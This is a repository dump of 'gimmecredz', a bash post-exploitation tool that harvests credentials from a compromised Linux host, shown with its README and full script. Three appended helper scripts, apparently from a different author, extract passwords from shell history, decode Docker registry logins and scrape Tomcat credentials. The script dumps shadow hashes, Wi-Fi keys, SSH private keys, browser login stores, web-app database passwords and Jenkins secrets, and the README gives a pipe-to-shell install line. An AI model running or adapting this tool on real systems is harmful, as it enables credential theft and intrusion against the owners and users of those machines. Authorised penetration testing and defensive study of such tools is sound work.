├── README.md
├── gimmecredz.sh
└── screenshot1.png

/README.md:
--------------------------------------------------------------------------------
You are a pentester, and you totally pwned that linux box (desktop, laptop, server, whatever). Now what? You can read a lot of files (config files, shell history and so on) in order to find something smelly. That is time consuming, boring, or both. I decided to write a tool to automate credential harvesting on a pwned box.

# Objective
This tool helps pentesters quickly dump all credz from known locations, such as .bash_history, config files, wordpress credentials, and so on...
This is not a hacking tool, just a collection of well-known files with passwords in them.
The password can be in clear, base64 or enciphered form. It's up to the pentester to use them, decode them or change them.
This tool can be launched as root or as any user: it autodetects file access and adapts accordingly (as a user it only looks in your own $HOME, as root it loops over every account that has a login shell).

# Goals
- this tool is in bash because bash is everywhere, and I wanted it to be as compatible as possible with all pwned systems without having to install any third party lib/shell/script language.
- this tool should be easy to read/tweak and easy to extend with new password dumps
- this tool should not be taken too seriously
- this tool uses mainly bash with a little bit of grep, find, awk and some other usual tools.
- I don't care if this tool fails softly on one file or another. I prefer a simple tool with a few soft failures over a heavier tool bloated with failchecks and sanity verification.
- this tool should run quick. For this reason I don't want some hazardous find, such as `find / -type f -exec grep password {} \;`: every find is bounded with a small -maxdepth (3 under home directories, 5 under web roots).
- this tool should be self-documenting. Read it.
- this tool is not sponsored by the NSA and won't send your credz to any third party.

# Usage
Easy usage:
```bash
wget https://raw.githubusercontent.com/0xmitsurugi/gimmecredz/master/gimmecredz.sh
chmod +x gimmecredz.sh
./gimmecredz.sh
```
Or, for the l33t:
```bash
$ curl https://raw.githubusercontent.com/0xmitsurugi/gimmecredz/master/gimmecredz.sh | bash
```
(The l33t way runs whatever the server sends you, unread. On an engagement, fetch the script once, read it, then copy it to the target.)

Check the start of the script, you can set vars there. `ROOT=1` forces the root-only checks even when you are an unprivileged user (in the hope the target is misconfigured; expect errors). `VERBOSE=1` prints every check, even the failed ones.

# Future devs
- adding more files, moar, moar!! The moar, the better!
- adding the ability to save any found file: you launch the script, you get a tarball with all of the juicy files in it (see the TAR variable).

# Screenshots (everybody loves screenshots!)
![Awesome tool](screenshot1.png)

# Key extraction:
Except for "root access", all files are checked. If a file lives under a home directory and you are root, the check loops over every user with a login shell.

## Root access
- /etc/shadow entries that carry a real hash (password field other than `*` or `!`): those are the accounts worth cracking
- WPA passphrases stored in wpa_supplicant or NetworkManager
- grub password
- ldap bind password (/etc/*ldap*.secret)
- password in fstab
- All other checks are done for root, and for

## Files with credz
- .docker/config.json (registry logins, base64 of user:password)
- mysql .my.cnf
- pidgin (libpurple) accounts.xml
- hexchat stored password to channels
- postgresql .pgpass
- mysql and rdesktop pass stored in (z|ba)sh history
- presence of a --password in (z|ba)sh history
- ssh keys (protected by a passphrase, and unprotected)
- keepassx databases (and whether one is currently open, from its .lock file)

## Browsers
- Firefox logins.json and key3.db / key4.db
- Chrome / Chromium Login Data

## Webapps
- wordpress credz
- drupal credz
- Joomla! credz
- tomcat credz (need testing, finding tomcat home is not exact science)
- jenkins secrets (master.key, hudson.util.Secret and credentials.xml, to be decrypted offline)

## More to come:
I want to add databases, tomcat passwords, better .bash_history parsing, and any other file of interest which contains passwords and which can be accessed reliably. If you have any idea/improvement, share it.

# FAQ
### You forgot to check this file or this directory
Make a pull request, send me an email, ping me on twitter, I'll add it

### Can you change something here or here in the script?
Make a pull request, send me an email, ping me on twitter, I'll add it

### Your tool fails to extract a password
Make a pull request, send me an email, ping me on twitter, I'll add it (the more files, the better)

### I've found a bug!
Make a pull request, send me an email, ping me on twitter, I'll add it

### I love you and I want to marry you
Make a pull request, send me an^W^W^W Wait, WHAT?

### Does it have a license?
BeerWare. If you're happy to use it, ping me :)

### There is no configure or make?
Dude, this is pure bash

### Is it compatible with blockchain?
LMAO!! Nope.

### No really?
This is in my roadmap, I'll code it in v42.193.254-patchlevelGoldEdition-EditorFinalCut. Reservation needed, ICO in 3 months, it'll cost you only 25k$.

### But this looks like LaZagne, which is a tool designed to extract passwords?
Yes, and [LaZagne](https://github.com/AlessandroZ/LaZagne) is a really great tool. Use it with my blessings. And [pupy](https://github.com/n1nj4sec/pupy/) too. I'm a happy user of both :)

### Does P=NP?
I have a beautiful demonstration of this theorem, but it doesn't fit on ~~this margin~~ ~~this github~~ this internet.

### This is not secure code
We are speaking of a pwned system, so what? This is designed for pentesters, and they should know what they do.

### I've tested it and now everybody has seen my password on the screen!
Is your password hunter2?

# Thanks
Thanks to [Hexpresso](https://twitter.com/HexpressoCTF) for the inspirational IRC talk :)

--------------------------------------------------------------------------------
/gimmecredz.sh:
--------------------------------------------------------------------------------
#! /bin/bash
# If there is a will, there is a way
# 0xMitsurugi
# v0.0.5

############## Credz dumper ##############################
# This script tries to grab every stored password/secret
# it knows about on a linux box.

# Default vars
ROOT=0      # If set to 1, we'll also try the files usually owned by root
            # (produces errors as a user, but may hit a misconfigured target)
TAR=0       # should we copy and save files for later use? 0: no, 1: yes
            # (under planning)
VERBOSE=0   # should we print failed checks? 1: yes, 0: no

##########################################################
# dumping functions

_user_homes() {
    # Home directory of every account with a login shell
    # (sh, bash, zsh, ksh or dash, under /bin or /usr/bin), one per line
    grep -E ':/(usr/)?bin/(ba|z|k|da)?sh$' /etc/passwd | cut -d ':' -f6 | sort -u
}

_grep_file() {
    # $1 name of the check
    # $2 file, relative to a home dir
    # $3... grep options and pattern, as separate words
    # If we are root, loop over every user, else do it for the current user only
    local name=$1 file=$2 userhome
    shift 2
    if [ "$(_check_root)" = "yes" ]; then
        while IFS= read -r userhome; do
            _grep_file_user "$name" "$userhome" "$file" "$@"
        done < <(_user_homes)
    else
        _grep_file_user "$name" "$HOME" "$file" "$@"
    fi
}

_grep_file_user() {
    # $1 name of the check
    # $2 directory (a home dir, /etc...; empty when $3 is already a full path)
    # $3 file (or a directory, together with -r in the grep options)
    # $4... grep options and pattern, as separate words (e.g. -B1 'password')
    local name=$1 dir=$2 file=$3 path data
    shift 3
    path="${dir:+$dir/}$file"
    if [ -r "$path" ]; then
        # grep exits 0 on match, 1 on no match, 2 on error: only 0 is a win
        if data=$(grep "$@" -- "$path" 2>/dev/null); then
            _dump_name "$name credz [$path]"
            _print_win "$path" "$data"
        fi
    else
        _print_lose "$path" "no access to file"
    fi
}

_dump_wifi_wpa_supplicant() {
    #Check if there are some WPA passphrases saved in wpa_supplicant.conf
    #First, find the conf file(s); if there are many, try each of them
    #Second, extract the psk (and the 6 lines above it, the ssid is there)
    local conffile
    for conffile in /etc/wpa_supplicant.d/*conf /etc/wpa_supplicant/*.conf /etc/wpa_supplicant.conf
    do
        [ -r "$conffile" ] || continue
        _grep_file_user "WPA SUPPLICANT" "" "$conffile" -B6 'psk='
    done
}

_dump_wifi_wpa_nm() {
    #Spits any saved psk with its SSID (NetworkManager keeps one keyfile per connection)
    #If the directory doesn't exist, get out
    local dir=/etc/NetworkManager/system-connections found=0 conn
    [ -d "$dir" ] || return
    while IFS= read -r -d '' conn; do
        if grep -q 'psk=' "$conn" 2>/dev/null; then
            found=1
            _dump_name "WPA PSK saved in NetworkManager"
            _print_win "$conn" "$(grep -E '^(id|ssid|psk)=' "$conn")"
        fi
    done < <(find "$dir" -type f -print0 2>/dev/null)
    if [ $found -eq 0 ]; then
        _print_lose "$dir/*" "No PSK saved nor files"
    fi
}

_dump_grub() {
    #Sometimes, grub has a password. The generated grub.cfg lives under /boot,
    #and on debian & co the password_pbkdf2 line comes from /etc/grub.d/
    local cfg
    for cfg in /boot/grub/grub.cfg /boot/grub2/grub.cfg /etc/grub/grub.cfg
    do
        [ -r "$cfg" ] && _grep_file_user "GRUB password" "" "$cfg" password
    done
    if [ -d /etc/grub.d/ ]; then
        #Sometimes the password is in one of those multiple files
        _grep_file_user "GRUB password" "" /etc/grub.d -r password
    fi
}

_dump_ldap() {
    #Sometimes, a linux box is bound to an LDAP: the bind password sits in a .secret file
    local secrets
    for secrets in libnss-ldap.secret ldap.secret pam_ldap.secret
    do
        [ -r "/etc/$secrets" ] && _grep_file_user "LDAP password" /etc "$secrets" -v '^$'
    done
}

_dump_shadow() {
    #If we are root, dump the shadow entries that carry a real hash
    #(locked accounts have *, ! or !! in the password field)
    #and start preheating crackingStation-128CPU
    if [ "$(_check_root)" = "yes" ] && [ -r /etc/shadow ]; then
        _dump_name "Interesting data in shadow file"
        _print_win "/etc/shadow" "$(grep -E -v '^[^:]*:(\*|!+|!\*|\*LK\*):' /etc/shadow)"
    fi
}

_dump_chrome_user() {
    #Try to locate the "Login Data" sqlite file of Chrome or Chromium
    #It contains the logins in clear and the passwords encrypted
    #$1 is home dir
    local profile
    for profile in "$1"/.config/google-chrome/Default "$1"/.config/chromium/Default
    do
        if [ -r "$profile/Login Data" ]; then
            _dump_name "Google Chrome / Chromium login details"
            _print_win "$profile/Login Data" "Check this file, it may contain credz"
        fi
    done
}

_dump_firefox_user() {
    #Try to find logins.json files, they contain the (encrypted) logins
    #The key is in key3.db (old profiles) or key4.db (Firefox 58 and later)
    #We don't decrypt them, that's too [hard|long] in pure bash
    #if you want the passwords, grab both files and use any program which does the job
    # See : https://support.mozilla.org/fr/questions/1154032 or google "firefox decrypt password key4.db"
    #$1 is home dir
    local d keydb
    #this glob avoids the profiles.ini file
    for d in "$1"/.mozilla/firefox/????????.????*
    do
        [ -r "$d/logins.json" ] || continue
        for keydb in key4.db key3.db
        do
            if [ -r "$d/$keydb" ]; then
                _dump_name "firefox logins.json and $keydb file"
                _print_win "$d/logins.json" "Check this file, it has credz inside"
                _print_win "$d/$keydb" "This file has the key to open logins.json"
            fi
        done
    done
}

_loop_users() {
    #$1 is the name of a function taking a home dir as its only argument
    local userhome
    if [ "$(_check_root)" = "yes" ]; then
        #We loop through the users who have a login shell
        while IFS= read -r userhome; do
            "$1" "$userhome"
        done < <(_user_homes)
    else
        "$1" "$HOME"
    fi
}

_ssh_key_unprotected() {
    #Returns 0 when $1 is a private key without passphrase.
    #PEM keys announce a passphrase with a "Proc-Type: 4,ENCRYPTED" header.
    #The new OpenSSH format (default since OpenSSH 7.8) doesn't: the cipher
    #name is the first string of the base64 payload, right after
    #"openssh-key-v1", and reads "none" for an unprotected key.
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$1"; then
        sed -n '/BEGIN OPENSSH/,/END OPENSSH/p' "$1" | grep -v -- '-----' | tr -d '\n' \
            | base64 -d 2>/dev/null | head -c 32 | tr -d '\000' | grep -aq 'openssh-key-v1.none'
    else
        ! grep -q 'ENCRYPTED' "$1"
    fi
}

_dump_ssh_keys() {
    #We need to find ssh private keys, and tell the unprotected from the protected ones
    #$1 is home dir
    local home=$1 f
    if [ ! -d "$home/.ssh" ]; then
        _print_lose "$home" "No .ssh directory"
        return
    fi
    while IFS= read -r -d '' f; do
        grep -q 'PRIVATE KEY-----' "$f" 2>/dev/null || continue
        if _ssh_key_unprotected "$f"; then
            _dump_name "SSH Keys"
            _print_win "$f" "ssh key without protection"
        else
            _print_lose "$f" "ssh key protected with passphrase"
        fi
    done < <(find "$home/.ssh/" -type f -print0 2>/dev/null)
}

_dump_keepassx() {
    #We try to find keepass .kdb and .kdbx files
    #We use find, and we fail fast (maxdepth=3) to avoid infinite directories
    #$1 is home dir
    local home=$1 f found=0
    while IFS= read -r -d '' f; do
        if [ $found -eq 0 ]; then
            _dump_name "keepassx file"
            found=1
        fi
        #KeePassX/KeePassXC keep a .<name>.lock beside an open database:
        #if it's open, the master password sits in the process memory, dump it
        if [ -f "$(dirname "$f")/.$(basename "$f").lock" ]; then
            _print_win "$f" "Keepassx database open? (lock file found)"
        else
            _print_win "$f" "Keepassx database"
        fi
    done < <(find "$home" -maxdepth 3 -type f \( -iname '*.kdb' -o -iname '*.kdbx' \) -print0 2>/dev/null)
    if [ $found -eq 0 ]; then
        _print_lose "$home" "No keepassx file found (no *.kdb, no *.kdbx)"
    fi
}

# _dump_webpass cmsname configfile
_dump_webpass() {
    #Puts the password lines of the config file in GLOBALCREDZ
    case "$1" in
        Wordpress) GLOBALCREDZ=$(grep -B4 -A1 DB_PASSWORD "$2") ;;
        #drop the big comment block first, it has 'password' examples in it
        Drupal)    GLOBALCREDZ=$(grep -E -v '\*' "$2" | grep -B4 -A1 "'password' =>") ;;
        #$user = '...'; is followed by $password = '...';
        Joomla!)   GLOBALCREDZ=$(grep -A1 '\$user =' "$2") ;;
        *)         GLOBALCREDZ='' ;;
    esac
}

_web_docroots() {
    #DocumentRoot of the apache vhosts and root of the nginx server blocks,
    #one path per line, comments skipped, quotes and the nginx ';' stripped.
    #A single file may declare several: never assume one root per site.
    local f
    for f in /etc/apache2/sites-available/* /etc/httpd/conf.d/*.conf /etc/httpd/conf/httpd.conf
    do
        [ -r "$f" ] && awk '/^[[:space:]]*DocumentRoot[[:space:]]/ { gsub(/"/, "", $2); print $2 }' "$f"
    done
    for f in /etc/nginx/sites-available/* /etc/nginx/conf.d/*.conf
    do
        [ -r "$f" ] && awk '/^[[:space:]]*root[[:space:]]/ { sub(/;.*/, "", $2); gsub(/"/, "", $2); print $2 }' "$f"
    done
}

# _dump_webconf filename cmsname
_dump_webconf() {
    #Webapps are a little weird. I don't make any assumption such as userid
    #Let's try with anybody, and if we find a file, let's rock
    #First, find the WebRoots (apache? nginx?)
    #Second, find the config file (wp-config.php...) under each of them and grep it!
    #The trailing * also catches wp-config.php.bak and friends
    local docroot webconf found
    while IFS= read -r docroot; do
        [ -d "$docroot" ] || continue
        found=0
        while IFS= read -r -d '' webconf; do
            found=1
            _dump_webpass "$2" "$webconf"
            _dump_name "$2 config file"
            _print_win "$webconf" "$GLOBALCREDZ"
        done < <(find "$docroot" -maxdepth 5 -type f -name "$1*" -print0 2>/dev/null)
        if [ $found -eq 0 ]; then
            _print_lose "$docroot" "No $2 $1 found"
        fi
    done < <(_web_docroots | sort -u)
}

_dump_tomcat() {
    #This is not easy because $CATALINA_HOME (or equivalent) could point
    #anywhere... and folders named conf/ are prone to false positives...
    # Sooo... at first try to imagine where your tomcat could be
    # (debian packages use /var/lib/tomcatN and /usr/share/tomcatN),
    #then grep the conf/ files for passwords \o/
    local parent tomcat
    for parent in / /var/www /var/www/html /srv/www /opt /usr/local /srv /var/lib /usr/share
    do
        [ -d "$parent" ] || continue
        #now try to go one step lower
        for tomcat in "${parent%/}"/*/
        do
            tomcat=${tomcat%/}
            [ -r "$tomcat/conf/server.xml" ] && \
                _grep_file_user "ConnectionDB in tomcat" "$tomcat/conf" "server.xml" -B1 connectionURL
            [ -r "$tomcat/conf/tomcat-users.xml" ] && \
                _grep_file_user "tomcat users" "$tomcat/conf" "tomcat-users.xml" password
            [ -r "$tomcat/conf/context.xml" ] && \
                _grep_file_user "tomcat JNDI resources" "$tomcat/conf" "context.xml" 'password='
        done
    done
}

_dump_jenkins() {
    #Jenkins encrypts its stored credentials with hudson.util.Secret, which is
    #itself encrypted with master.key: with those two files, every secret in
    #credentials.xml can be decrypted offline
    local jenkinshome possible_secrets
    for jenkinshome in /home/jenkins /var/lib/jenkins
    do
        [ -r "$jenkinshome/secrets/master.key" ] && [ -r "$jenkinshome/secrets/hudson.util.Secret" ] || continue
        possible_secrets=$(grep -E -i '<(password|passphrase|secret|privateKey|secretBytes)>' "$jenkinshome/credentials.xml" 2>/dev/null)
        [ -n "$possible_secrets" ] || continue
        _dump_name "Jenkins secrets"
        _print_win "$jenkinshome/secrets/master.key" "Jenkins master key"
        _print_win "$jenkinshome/secrets/hudson.util.Secret" "Hudson secret"
        _print_win "$jenkinshome/credentials.xml" "$possible_secrets"
        echo "Check https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py in order to decrypt the secrets"
    done
}


##########################################################
# internal functions
RESTORE=$(echo -en '\033[0m')
RED=$(echo -en '\033[00;31m')
GREEN=$(echo -en '\033[00;32m')
YELLOW=$(echo -en '\033[00;33m')
BLUE=$(echo -en '\033[00;34m')
MAGENTA=$(echo -en '\033[00;35m')
PURPLE=$(echo -en '\033[00;35m')
CYAN=$(echo -en '\033[00;36m')
LIGHTGRAY=$(echo -en '\033[00;37m')
LRED=$(echo -en '\033[01;31m')
LGREEN=$(echo -en '\033[01;32m')
LYELLOW=$(echo -en '\033[01;33m')
LBLUE=$(echo -en '\033[01;34m')
LMAGENTA=$(echo -en '\033[01;35m')
LPURPLE=$(echo -en '\033[01;35m')
LCYAN=$(echo -en '\033[01;36m')
WHITE=$(echo -en '\033[01;37m')

_banner () {
    echo "${RED}#####################################################${RESTORE}"
    echo "${RED}#${RESTORE} Gimme credz !!!"
    echo "${RED}#####################################################${RESTORE}"
    #echo "One-file bash-only script"
    #echo "Harvest all known credz at once"
    #echo
    echo "${RED}#${RESTORE} The name's 0xMitsurugi"
    echo "${RED}#${RESTORE} Remember it!"
    echo "${RED}#####################################################${RESTORE}"
}

_dump_name() {
    echo
    echo "${GREEN}***** ${RESTORE}$1 ${GREEN}***** ${RESTORE}"
    echo
}

_check_root() {
    #Prints "yes" or "no". ROOT=1 pretends we are root so that the root-only
    #checks are attempted anyway. Never assign to ROOT from here: doing so
    #overwrites the toggle with yes/no and ROOT=1 stops working after the first check.
    if [ "$ROOT" = "1" ] || [ "$EUID" -eq 0 ]; then
        echo "yes"
    else
        echo "no"
    fi
}

_print_win() {
    #$1 : file containing the secret
    #$2 : the secret (or a hint when we can't decode it in bash)
    echo "${GREEN}[+] GOT ONE!!${RESTORE}"
    if [ -e "$1" ] && command -v realpath >/dev/null 2>&1; then
        echo "${LBLUE}File: ${RESTORE} $(realpath "$1")"
    else
        echo "${LBLUE}File: ${RESTORE} $1"
    fi
    echo "$2"
    #This is the place to save the file for a future use (TAR=1)
}

_print_lose() {
    #$1 : file supposed to contain a secret
    #$2 : lose message
    if [ "$VERBOSE" -eq 1 ]; then
        echo "${RED}[ ] NOPE${RESTORE}"
        echo "${LBLUE}File: ${RESTORE} $1"
        echo "$2"
    fi
}

_echo_error() {
    echo "${RED}[!] Error${RESTORE}"
    echo "$1"
}

_paragraph() {
    echo
    echo "${RED}#################${RESTORE} $1 ${RED}###########################${RESTORE}"
}

##########################################################
# Main loop

_banner
#Are we saving everything? (TAR=1, not implemented yet)
#if [ $TAR -eq 1 ]; then
#    if [ -d TAR/ ]; then
#        _echo_error "TAR/ exists. Disabling output"
#        TAR=0
#    else
#        mkdir TAR/
#    fi
#fi

###################### If we are root, then get the kingdom keys
# see the comment in _check_root if U want to try those checks anyway
#Start dump!!
if [ "$(_check_root)" = "yes" ]; then
    _paragraph "ROOT ACCESS!"
    _dump_shadow
    _dump_wifi_wpa_nm
    _dump_wifi_wpa_supplicant
    _dump_grub
    _dump_ldap
    _grep_file_user "Password in fstab" "/etc" "fstab" -E '[^<]pass'
    #Should we dump the LUKS key? For what usage if we are in pentest?
    # in case you need it -> dmsetup table --showkeys crypto
fi

###################### Have fun with credz stored in files
_paragraph "FILES!"
#Documentation:
#_grep_file "Name of check" "Filepath (relative to each $HOME/)" grep options and pattern
_grep_file ".docker/config.json" ".docker/config.json" -B1 'auth":'
_grep_file "mysql_my_cnf" ".my.cnf" -B1 password
_grep_file "pidgin (libpurple)" ".purple/accounts.xml" -B1 password
_grep_file "hexchat passwords for servers" ".config/hexchat/servlist.conf" -E -B1 'C='
_grep_file "postgreSQL" ".pgpass" ':'
for hist in .bash_history .zsh_history
do
    _grep_file "mysql pass in CLI history" "$hist" -E 'mysql.*-p'
    _grep_file "rdesktop pass in CLI history" "$hist" -E 'rdesktop.*-p '
    _grep_file "password switch found in history" "$hist" -e '--password'
done
#Always interesting to look there
_loop_users _dump_ssh_keys
#Keepass databases are good targets
_loop_users _dump_keepassx

######################### And now, browsers
_paragraph "BROWSERS!"
_loop_users _dump_firefox_user
_loop_users _dump_chrome_user
#old browsers? such as Konqueror?


############################# Play with webapps!
#Find tomcat home, dump admin pass
#How to find tomcat home reliably???
_paragraph "WEB APPS!"
GLOBALCREDZ=''
_dump_webconf "wp-config.php" "Wordpress"
_dump_webconf "settings.php" "Drupal"
_dump_webconf "configuration.php" "Joomla!"
_dump_tomcat
_dump_jenkins
#Add Directory Alias apache config?
#if we found locatedb, should we use it?
#.yml files (symfony) => credz config.yml or parameters.yml

#Databases
#find mysql file, postgresql file, etc..
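The history checks in the script grep `mysql.*-p`, `rdesktop.*-p ` and `--password` out of the shell history, and the README lists better .bash_history parsing as future work. The following is an added example of what that parsing can look like; it is my code, not part of gimmecredz. It strips the zsh EXTENDED_HISTORY prefix (`: <epoch>:<duration>;`) and the bash `#<epoch>` timestamp lines, matches the same secret-on-the-command-line idioms plus two more that are just as common (`PGPASSWORD=` and `sshpass -p`), and masks the secret so the hit can go straight into a report. The history lines are constructed for the example.

```shell
#!/bin/sh
# Added example, not part of gimmecredz: find passwords typed on the command
# line in bash/zsh history and print the offending commands with the secret masked.

# zsh with EXTENDED_HISTORY writes ": <epoch>:<duration>;<command>"; bash writes
# the bare command (preceded by a "#<epoch>" line when HISTTIMEFORMAT is set).
_hist_normalize() {
    sed -E -e 's/^: [0-9]+:[0-9]+;//' -e '/^#[0-9]+$/d'
}

# Print every command that carries a secret inline, masked. Patterns:
#   --password=x / --password x   (mysql, mysqldump, smbclient, ...)
#   mysql ... -pX                 (password glued to -p)
#   rdesktop ... -p X
#   PGPASSWORD=x psql ...
#   sshpass -p x ssh ...
# A bare "-p " followed by a space (mkdir -p dir) is deliberately not matched.
history_leaks() {
    _hist_normalize \
      | grep -E -e '--password[= ][^ ]' -e 'mysql[^|;]* -p[^ ]' -e 'rdesktop.* -p [^ ]' \
                -e 'PGPASSWORD=[^ ]' -e 'sshpass -p [^ ]' \
      | sed -E \
          -e 's/(--password[= ])[^ ]+/\1********/g' \
          -e 's/(mysql[^|;]* -p)[^ ]+/\1********/' \
          -e 's/(rdesktop.* -p )[^ ]+/\1********/' \
          -e 's/(PGPASSWORD=)[^ ]+/\1********/g' \
          -e 's/(sshpass -p )[^ ]+/\1********/'
}

# Constructed sample: bash-style and zsh-style lines, plus noise that must not match.
SAMPLE_HISTORY=$(cat <<'EOF'
ls -la
: 1700000000:0;mysql -u root -pS3cret! shop_db
mysqldump -u backup --password=BackupPw prod > dump.sql
rdesktop -u admin -p Winter2019 10.0.0.5
: 1700000042:3;PGPASSWORD=pgpw psql -h db -U app
sshpass -p 'hunter2' ssh deploy@web01
mkdir -p /tmp/build
EOF
)

# Run it over the sample (on a real box: history_leaks < ~/.bash_history)
printf '%s\n' "$SAMPLE_HISTORY" | history_leaks
```

The grep patterns are the detector and the sed rules the masker, so adding an idiom means one line in each. Note that `--password ` still fires on a command that merely mentions the word (a `git commit -m "add --password option"`), so treat the list as leads to read, not as findings.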
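The `.docker/config.json` check in the script only greps the `auth` line, and the README leaves decoding to you. As an added example (my code, not from gimmecredz), this decodes the registry logins without jq: each `auth` value is base64 of `user:password`, and since the password itself may contain a colon the split has to happen on the first one only. The config file content below is constructed for the example.

```shell
#!/bin/sh
# Added example, not part of gimmecredz: turn the "auth" entries of
# ~/.docker/config.json into registry / user / password, without jq.

# stdin: config.json. stdout: registry<TAB>user<TAB>password, one line per entry.
# "auth" is base64("user:password"); the password may itself contain ':',
# so split on the first colon only. An entry without a colon (identity token)
# is printed with an empty password column.
docker_auths() {
    tr -d ' \n\r\t' \
      | grep -o '"[^"]*":{"auth":"[^"]*"' \
      | sed -E 's/^"([^"]*)":\{"auth":"([^"]*)"$/\1 \2/' \
      | while read -r registry b64; do
            decoded=$(printf '%s' "$b64" | base64 -d 2>/dev/null) || continue
            case $decoded in
                *:*) printf '%s\t%s\t%s\n' "$registry" "${decoded%%:*}" "${decoded#*:}" ;;
                *)   printf '%s\t%s\t\n' "$registry" "$decoded" ;;
            esac
        done
}

# Constructed sample: two registries, the second password contains a colon.
SAMPLE_DOCKER_CONFIG='{
  "auths": {
    "https://index.docker.io/v1/": {
      "auth": "ZGVwbG95OkRvY2tlclB3MTIz"
    },
    "registry.example.internal:5000": {
      "auth": "Y2k6czNjcjN0OnBhc3M=",
      "email": "ci@example.internal"
    }
  },
  "HttpHeaders": { "User-Agent": "Docker-Client/20.10" }
}'

# On a real box: docker_auths < ~/.docker/config.json
# (no "auth" key at all means the logins went to a credsStore helper instead)
printf '%s' "$SAMPLE_DOCKER_CONFIG" | docker_auths
```

Whitespace is stripped first so the pattern does not care how the JSON was indented; the registry name is the key of the object that carries `auth`, which is the hostname you log in to.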
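`_dump_tomcat` guesses parent directories, and the README admits that finding the tomcat home is not an exact science. When Tomcat is running there is a more reliable source: the startup scripts pass `-Dcatalina.base` and `-Dcatalina.home` to the JVM, and both are readable from `/proc/<pid>/cmdline`. The added example below (my code, not gimmecredz's) extracts those, then pulls credentials out of `conf/tomcat-users.xml` and the JNDI `<Resource>` entries of `conf/context.xml`, skipping the commented-out sample users the stock file ships with and tolerating any attribute order. The fixtures are constructed in a temp dir; only `running_tomcat_bases` touches the live /proc.

```shell
#!/bin/sh
# Added example, not part of gimmecredz: find Tomcat instances from the JVM
# command line and pull credentials out of conf/tomcat-users.xml and conf/context.xml.

# stdin: a java command line, NUL-separated as in /proc/<pid>/cmdline (spaces work too).
# Prints catalina.base, falling back to catalina.home (both are passed as -D properties).
tomcat_base_from_cmdline() {
    tr '\000' '\n' | tr ' ' '\n' | awk -F= '
        $1 == "-Dcatalina.base" { base = $2 }
        $1 == "-Dcatalina.home" { home = $2 }
        END { if (base != "") print base; else if (home != "") print home }'
}

# Live box: base directory of every running Tomcat whose cmdline we can read.
running_tomcat_bases() {
    for p in /proc/[0-9]*; do
        grep -qa 'catalina' "$p/cmdline" 2>/dev/null || continue
        tomcat_base_from_cmdline < "$p/cmdline"
    done | sort -u
}

# Drop <!-- ... --> comments (multi-line too): the stock tomcat-users.xml ships
# its example users inside a comment, and grepping them would be a false hit.
strip_xml_comments() {
    awk '{
        line = $0; out = ""
        while (1) {
            if (incomment) {
                i = index(line, "-->")
                if (i == 0) { line = ""; break }
                line = substr(line, i + 3); incomment = 0
            } else {
                i = index(line, "<!--")
                if (i == 0) break
                out = out substr(line, 1, i - 1)
                line = substr(line, i + 4); incomment = 1
            }
        }
        print out line
    }'
}

# $1: element name, $2...: attribute names. stdin: XML without comments.
# One line per element, requested attributes tab-separated, whatever their source order.
xml_attrs() {
    tag=$1; shift
    tr '\n' ' ' | grep -o "<$tag [^>]*>" | awk -v names="$*" '
        function attr(line, name,    re) {
            re = "[ \t]" name "=\"[^\"]*\""
            if (!match(line, re)) return ""
            return substr(line, RSTART + length(name) + 3, RLENGTH - length(name) - 4)
        }
        BEGIN { n = split(names, want, " ") }
        {
            row = ""
            for (i = 1; i <= n; i++) row = row (i > 1 ? "\t" : "") attr($0, want[i])
            print row
        }'
}

tomcat_users() { strip_xml_comments < "$1" | xml_attrs user username password roles; }
tomcat_jdbc()  { strip_xml_comments < "$1" | xml_attrs Resource name username password url; }

# Constructed fixtures: a fake /proc cmdline and a conf/ directory under a temp dir.
make_tomcat_fixtures() {
    d=$(mktemp -d)
    mkdir -p "$d/conf"
    printf '/usr/bin/java\000-Dcatalina.base=%s\000-Dcatalina.home=/usr/share/tomcat9\000org.apache.catalina.startup.Bootstrap\000start' "$d" > "$d/cmdline"
    cat > "$d/conf/tomcat-users.xml" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
<!--
  <role rolename="tomcat"/>
  <user username="tomcat" password="tomcat" roles="tomcat"/>
-->
  <role rolename="manager-gui"/>
  <user username="admin" password="Tomcat!2019" roles="manager-gui,admin-gui"/>
  <user password="s3cret" roles="manager-script" username="ci"/>
</tomcat-users>
EOF
    cat > "$d/conf/context.xml" <<'EOF'
<Context>
  <!-- <Resource name="jdbc/old" username="old" password="old" url="jdbc:old"/> -->
  <Resource name="jdbc/shop" auth="Container" type="javax.sql.DataSource"
            username="shop" password="DbPw#42" driverClassName="org.postgresql.Driver"
            url="jdbc:postgresql://db.internal:5432/shop"/>
</Context>
EOF
    echo "$d"
}

# Demo run. On a real box: for b in $(running_tomcat_bases); do tomcat_users "$b/conf/tomcat-users.xml"; done
d=$(make_tomcat_fixtures)
base=$(tomcat_base_from_cmdline < "$d/cmdline")
tomcat_users "$base/conf/tomcat-users.xml"
tomcat_jdbc "$base/conf/context.xml"
rm -rf "$d"
```

`catalina.base` is the instance directory (the one with `conf/`), which is why it takes precedence over `catalina.home`; on Debian-packaged Tomcats the two differ. The `<Resource>` in `context.xml` spans several lines in the wild, hence the join before the element grep. A `password` in `tomcat-users.xml` may be a digest rather than clear text when a `CredentialHandler` is configured, so read the value before assuming it logs in.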
--------------------------------------------------------------------------------
/screenshot1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xmitsurugi/gimmecredz/06316e6949168d591ff914604cdb01f1016b4b63/screenshot1.png
--------------------------------------------------------------------------------